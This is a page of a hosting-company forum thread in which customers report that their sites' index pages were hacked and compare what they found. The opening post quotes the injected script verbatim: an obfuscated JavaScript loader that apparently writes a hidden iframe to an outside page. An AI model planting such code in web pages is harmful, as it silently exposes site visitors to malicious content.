Welcome to the JaguarPC Community
JaguarPC
Sales: (888) 338-5261
Support: (888)-551-3050
Page 1 of 18 1234511 ... LastLast
Results 1 to 15 of 267

This is a discussion on Hacker Attack in the Shared & Semi-Dedicated forum
Steps to reproduce the problem: I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened ...

  1. #1
    JPC Member
    Join Date
    Sep 2007
    Location
    Deerfield Beach, Florida
    Posts
    5

    Hacker Attack

    Steps to reproduce the problem:

    I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

    at http://directory.isins.com , i noticed a piece of javascript was added at the end of the index page. Here it is:

    <<!-- ~ --><script language=javascript>document.write(unesc ape('%3C%73%63%72%69%70%74%20%6C%61%6E%6 7%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E% 20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75 %62%73%74%72%28%30%2C%73%2E%6C%65%6E%67% 74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C %73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6 F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E %63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%6 5%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28% 75%6E%65%73%63%61%70%65%28%74%29%29%3B%7 D%3C%2F%73%63%72%69%70%74%3E'));dF('%264 Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F %261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E% 2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui% 264E%26381%2638%2631ifjhiu%264E%26381%26 38%2631gsbnfcpsefs%264E%26381%2638%264F% 264D0jgsbnf%264F%2633%263%3A%261E%261B%2 64D0tdsjqu%264F1')</script><!-- ~ -->
    Last edited by wazimm; 09-17-2007 at 05:05 PM. Reason: forgot quotation marks

  2. #2
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Have you checked your logs yet?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    JPC Member
    Join Date
    Sep 2007
    Posts
    2
    Bugger- yep, I got hit too. On yoda if it matters. I doubt they came in through one of my scripts. Looks like most of the index pages were hit. I put in a ticket. Looking at logs will have to wait until morning- hopefully support will have it nailed down by then anyway.

  4. #4
    CTO JPC-Masood's Avatar
    Join Date
    Aug 2002
    Location
    Jaguar Servers
    Posts
    2,070
    Please make sure your account is secure: http://www.jaguarpc.com/support/kbase/731.html

    Masood N. | Chief Technical Officer
    JaguarPC.com


    Helpful Links
    Knowledge Base | Network Status

  5. #5
    JPC Member
    Join Date
    Sep 2007
    Posts
    2
    Thanks for the link- that's pretty much what the ticket reply said as well. However, I didn't have the raw logs saved. I've only got one script running and it is tight and up to date. While it's possible something could have snuck in that way, I seriously doubt it. I did have a current openid script up- though not linked in. Still- didn't see any security reports on it.

    The other option I can think of is guessing my ftp info. But without the raw logs- does that mean there's basically no way to track down how they gained access? If I can't track that down for sure, I can't be sure it's fixed.

  6. #6
    the Windlord Gwaihir's Avatar
    Join Date
    Jun 2002
    Posts
    2,562
    Can't support get you the raw log? This is a recent event, right?
    Regards,

    Wim Heemskerk
    ---
    Visit MeCCG.net - Cardgaming in J.R.R. Tolkien's Middle-earth
    And Gwaihir.net - The Middle-earth CCG store

  7. #7
    JPC Member
    Join Date
    Jun 2007
    Location
    Athens, Greece
    Posts
    1
    Quote Originally Posted by wazimm View Post
    Steps to reproduce the problem:

    I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

    at http://directory.isins.com , i noticed a piece of javascript was added at the end of the index page. Here it is:
    The exact same thing happened to me. It probably started yesterday, or the day before that. My main domain is a simple html file, linking to my two subdomains that both run the latest version of Wordpress. The same javascript was on all the index.(php|html|htm) files, on all three of the domains.

    I just re-uploaded everything to make sure it's gone.

  8. #8
    JPC Member
    Join Date
    Apr 2006
    Posts
    48
    yup, got hacked too.

    can someone give some info on this? how it was done and how it can be avoided again?

  9. #9
    JPC Member
    Join Date
    Apr 2006
    Posts
    48
    Any more news on this? I checked that all my pages were 644, i dont have any premade scripts on my site. I only have a few pages on my site and its off the internet. The only way you can get into the site is by logging in, and the usernames and passwords are pretty secure. I'm on the different server that yoda. Look like more than one server got attacked.

    Also, i didnt realise i got hacked until one of the users pointed it out. The javascript didnt work on my browser but it did on others. So other webmasters might want to check their index.htm|html|php pages to see if they got hacked. The code is on the footer of the pages.

  10. #10
    Old Hillbilly Connie's Avatar
    Join Date
    Sep 2001
    Location
    Hills of Missouri
    Posts
    2,648
    What is that javascript supposed to do?

    Forum Moderators - Jag Staff

    Spam Whackers Blog - Dedicated to fighting Spam and providing General SEO Tips
    Organize your Kitchen or purchase Kitchen Accessories at Condells
    Ihelpyou Forum - Dedicated to "Best Practices" SEO

  11. #11
    JPC Addict lloyd_borrett's Avatar
    Join Date
    May 2004
    Location
    Melbourne, Australia
    Posts
    132
    I'm constantly getting hacked on a number of my JaguarPC accounts over the last few days. I haven't been able to determine where the whole that is being exploited is. I can't even determine what the common demoninator to these accounts is.

  12. #12
    all about nothing! Frank Broughton's Avatar
    Join Date
    Jan 2006
    Posts
    2,158
    Lloyd,

    Are you in communication with the bigwigs on this?

  13. #13
    Loyal Client
    Join Date
    Nov 2003
    Location
    KY
    Posts
    27
    i have found several of the sites i maintain hacked today. they range from simple html sites to open source commerce sites. they span several servers on jag.

    i reported the info to jag, and got the same generic response link.. but with two of the sites being very basic html sites (with 1 php include for the menus), i don't see them being caused by a script..

    now i get to check every other site i maintain.

  14. #14
    Ron
    Ron is offline
    Loyal Client
    Join Date
    Aug 2002
    Posts
    7,307
    So far everything is ok at my sites.... but I don't like saying this.
    Good luck

  15. #15
    JPC Member
    Join Date
    Sep 2007
    Posts
    17

    hacked again

    9 sites hacked over the last 3 days, 3 of them 3 times ... I have also gotten the canned link from support as well. I am starting to think perhaps its another hole in cpanel or jag has some serious problems.
    Last edited by Mighty; 09-19-2007 at 12:28 PM. Reason: typo

Page 1 of 18 1234511 ... LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •